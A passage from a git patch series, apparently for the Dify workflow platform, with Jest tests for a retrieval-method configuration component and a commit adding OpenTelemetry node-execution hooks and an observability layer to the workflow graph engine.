RETRIEVE_METHOD.hybrid, + reranking_enable: true, + }), + ) + }) + + it('should not call onChange when clicking the already active method', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).not.toHaveBeenCalled() + }) + + it('should not call onChange when disabled', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + disabled: true, + }) + + const fullTextOption = screen.getByText('dataset.retrieval.full_text_search.title').closest('div[class*="cursor"]') + fireEvent.click(fullTextOption!) + + expect(onChange).not.toHaveBeenCalled() + }) + + it('should propagate onChange from RetrievalParamConfig', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const updateButton = screen.getByTestId('update-top-k-semantic_search') + fireEvent.click(updateButton) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + top_k: 10, + }), + ) + }) + }) + + // Tests for reranking model configuration + describe('Reranking Model Configuration', () => { + it('should set reranking model when switching to semantic and model is valid', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: 'test-provider', + reranking_model_name: 'test-rerank-model', + }, + reranking_enable: true, + }), + ) + }) + + it('should preserve existing reranking model when switching', () => { + const onChange = jest.fn() + const existingModel = { + reranking_provider_name: 'existing-provider', + reranking_model_name: 'existing-model', + } + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: existingModel, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: existingModel, + reranking_enable: true, + }), + ) + }) + + it('should set reranking_enable to false when no valid model', () => { + mockIsRerankDefaultModelValid = false + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_enable: false, + }), + ) + }) + + it('should set reranking_mode for hybrid search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_mode: RerankingModeEnum.RerankingModel, + }), + ) + }) + + it('should set weighted score mode when no valid rerank model for hybrid', () => { + mockIsRerankDefaultModelValid = false + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_mode: RerankingModeEnum.WeightedScore, + }), + ) + }) + + it('should set default weights for hybrid search when no existing weights', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + weights: undefined, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + weights: { + weight_type: WeightedScoreEnum.Customized, + vector_setting: { + vector_weight: DEFAULT_WEIGHTED_SCORE.other.semantic, + embedding_provider_name: '', + embedding_model_name: '', + }, + keyword_setting: { + keyword_weight: DEFAULT_WEIGHTED_SCORE.other.keyword, + }, + }, + }), + ) + }) + + it('should preserve existing weights for hybrid search', () => { + const existingWeights = { + weight_type: WeightedScoreEnum.Customized, + vector_setting: { + vector_weight: 0.8, + embedding_provider_name: 'test-embed-provider', + embedding_model_name: 'test-embed-model', + }, + keyword_setting: { + keyword_weight: 0.2, + }, + } + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + weights: existingWeights, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + weights: existingWeights, + }), + ) + }) + + it('should use RerankingModel mode and enable reranking for hybrid when existing reranking model', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.semantic, + reranking_model: { + reranking_provider_name: 'existing-provider', + reranking_model_name: 'existing-model', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_enable: true, + reranking_mode: RerankingModeEnum.RerankingModel, + }), + ) + }) + }) + + // Tests for callback stability and memoization + describe('Callback Stability', () => { + it('should maintain stable onSwitch callback when value changes', () => { + const onChange = jest.fn() + const value1 = createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText, top_k: 4 }) + const value2 = createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText, top_k: 8 }) + + const { rerender } = render( + , + ) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + + rerender() + + fireEvent.click(semanticOption!) + expect(onChange).toHaveBeenCalledTimes(2) + }) + + it('should use updated onChange callback after rerender', () => { + const onChange1 = jest.fn() + const onChange2 = jest.fn() + const value = createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }) + + const { rerender } = render( + , + ) + + rerender() + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange1).not.toHaveBeenCalled() + expect(onChange2).toHaveBeenCalledTimes(1) + }) + }) + + // Tests for component memoization + describe('Component Memoization', () => { + it('should be memoized with React.memo', () => { + // Verify the component is wrapped with React.memo by checking its displayName or type + expect(RetrievalMethodConfig).toBeDefined() + // React.memo components have a $$typeof property + expect((RetrievalMethodConfig as any).$$typeof).toBeDefined() + }) + + it('should not re-render when props are the same', () => { + const onChange = jest.fn() + const value = createMockRetrievalConfig() + + const { rerender } = render( + , + ) + + // Rerender with same props reference + rerender() + + // Component should still be rendered correctly + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + }) + }) + + // Tests for edge cases and error handling + describe('Edge Cases', () => { + it('should handle undefined reranking_model', () => { + const onChange = jest.fn() + const value = createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + }) + // @ts-expect-error - Testing edge case + value.reranking_model = undefined + + renderComponent({ + value, + onChange, + }) + + // Should not crash + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + }) + + it('should handle missing default model', () => { + mockRerankDefaultModel = undefined + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + ) + }) + + it('should use fallback empty string when default model provider is undefined', () => { + // @ts-expect-error - Testing edge case where provider is undefined + mockRerankDefaultModel = { provider: undefined, model: 'test-model' } + mockIsRerankDefaultModelValid = true + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: '', + reranking_model_name: 'test-model', + }, + }), + ) + }) + + it('should use fallback empty string when default model name is undefined', () => { + // @ts-expect-error - Testing edge case where model is undefined + mockRerankDefaultModel = { provider: { provider: 'test-provider' }, model: undefined } + mockIsRerankDefaultModelValid = true + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.fullText, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + reranking_model: { + reranking_provider_name: 'test-provider', + reranking_model_name: '', + }, + }), + ) + }) + + it('should handle rapid sequential clicks', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const fullTextOption = screen.getByText('dataset.retrieval.full_text_search.title').closest('div[class*="cursor-pointer"]') + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + + // Rapid clicks + fireEvent.click(fullTextOption!) + fireEvent.click(hybridOption!) + fireEvent.click(fullTextOption!) + + expect(onChange).toHaveBeenCalledTimes(3) + }) + + it('should handle empty supportRetrievalMethods array', () => { + mockSupportRetrievalMethods = [] + const { container } = renderComponent() + + expect(container.querySelector('[class*="flex-col"]')?.childNodes.length).toBe(0) + }) + + it('should handle partial supportRetrievalMethods', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.semantic, RETRIEVE_METHOD.hybrid] + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.full_text_search.title')).not.toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + it('should handle value with all optional fields set', () => { + const fullValue = createMockRetrievalConfig({ + search_method: RETRIEVE_METHOD.hybrid, + reranking_enable: true, + reranking_model: { + reranking_provider_name: 'provider', + reranking_model_name: 'model', + }, + top_k: 10, + score_threshold_enabled: true, + score_threshold: 0.8, + reranking_mode: RerankingModeEnum.WeightedScore, + weights: { + weight_type: WeightedScoreEnum.Customized, + vector_setting: { + vector_weight: 0.6, + embedding_provider_name: 'embed-provider', + embedding_model_name: 'embed-model', + }, + keyword_setting: { + keyword_weight: 0.4, + }, + }, + }) + + renderComponent({ value: fullValue }) + + expect(screen.getByTestId('retrieval-param-config-hybrid_search')).toBeInTheDocument() + }) + }) + + // Tests for all prop variations + describe('Prop Variations', () => { + it('should render with minimum required props', () => { + const { container } = render( + , + ) + + expect(container.firstChild).toBeInTheDocument() + }) + + it('should render with all props set', () => { + renderComponent({ + disabled: true, + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.hybrid }), + showMultiModalTip: true, + onChange: jest.fn(), + }) + + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + describe('disabled prop variations', () => { + it('should handle disabled=true', () => { + renderComponent({ disabled: true }) + const option = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(option).toHaveClass('cursor-not-allowed') + }) + + it('should handle disabled=false', () => { + renderComponent({ disabled: false }) + const option = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(option).toHaveClass('cursor-pointer') + }) + }) + + describe('search_method variations', () => { + const methods = [ + RETRIEVE_METHOD.semantic, + RETRIEVE_METHOD.fullText, + RETRIEVE_METHOD.hybrid, + ] + + test.each(methods)('should correctly highlight %s when active', (method) => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: method }), + }) + + // The active method should have its RetrievalParamConfig rendered + expect(screen.getByTestId(`retrieval-param-config-${method}`)).toBeInTheDocument() + }) + }) + + describe('showMultiModalTip variations', () => { + it('should pass true to child component', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + showMultiModalTip: true, + }) + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('true') + }) + + it('should pass false to child component', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + showMultiModalTip: false, + }) + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('false') + }) + }) + }) + + // Tests for active state visual indication + describe('Active State Visual Indication', () => { + it('should show recommended badge only on hybrid search', () => { + renderComponent() + + // The hybrid search option should have the recommended badge + // This is verified by checking the isRecommended prop passed to OptionCard + const hybridTitle = screen.getByText('dataset.retrieval.hybrid_search.title') + const hybridCard = hybridTitle.closest('div[class*="cursor"]') + + // Should contain recommended badge from OptionCard + expect(hybridCard?.querySelector('[class*="badge"]') || screen.queryByText('datasetCreation.stepTwo.recommend')).toBeTruthy() + }) + }) + + // Tests for integration with OptionCard + describe('OptionCard Integration', () => { + it('should pass correct props to OptionCard for semantic search', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + }) + + const semanticTitle = screen.getByText('dataset.retrieval.semantic_search.title') + expect(semanticTitle).toBeInTheDocument() + + // Check description + const semanticDesc = screen.getByText('dataset.retrieval.semantic_search.description') + expect(semanticDesc).toBeInTheDocument() + }) + + it('should pass correct props to OptionCard for fullText search', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }), + }) + + const fullTextTitle = screen.getByText('dataset.retrieval.full_text_search.title') + expect(fullTextTitle).toBeInTheDocument() + + const fullTextDesc = screen.getByText('dataset.retrieval.full_text_search.description') + expect(fullTextDesc).toBeInTheDocument() + }) + + it('should pass correct props to OptionCard for hybrid search', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.hybrid }), + }) + + const hybridTitle = screen.getByText('dataset.retrieval.hybrid_search.title') + expect(hybridTitle).toBeInTheDocument() + + const hybridDesc = screen.getByText('dataset.retrieval.hybrid_search.description') + expect(hybridDesc).toBeInTheDocument() + }) + }) +}) From bdccbb6e8679ca7d0ea808e681ecc53bbaf596bc Mon Sep 17 00:00:00 2001 From: heyszt <270985384@qq.com> Date: Tue, 16 Dec 2025 13:26:31 +0800 Subject: [PATCH 20/27] feat: add GraphEngine layer node execution hooks (#28583) --- .../workflow/graph_engine/graph_engine.py | 9 +- .../workflow/graph_engine/layers/__init__.py | 2 + api/core/workflow/graph_engine/layers/base.py | 27 +++ .../graph_engine/layers/node_parsers.py | 61 +++++ .../graph_engine/layers/observability.py | 169 ++++++++++++++ api/core/workflow/graph_engine/worker.py | 54 ++++- .../worker_management/worker_pool.py | 5 + api/core/workflow/nodes/base/node.py | 51 ++-- api/core/workflow/workflow_entry.py | 7 +- api/extensions/otel/decorators/base.py | 14 +- api/extensions/otel/runtime.py | 11 + .../workflow/graph_engine/layers/__init__.py | 0 .../workflow/graph_engine/layers/conftest.py | 101 ++++++++ .../graph_engine/layers/test_observability.py | 219 ++++++++++++++++++ 14 files changed, 682 insertions(+), 48 deletions(-) create mode 100644 api/core/workflow/graph_engine/layers/node_parsers.py create mode 100644 api/core/workflow/graph_engine/layers/observability.py create mode 100644 api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py create mode 100644 api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py create mode 100644 api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node._node_execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node._node_execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... + + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. + + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. + """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ -65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def 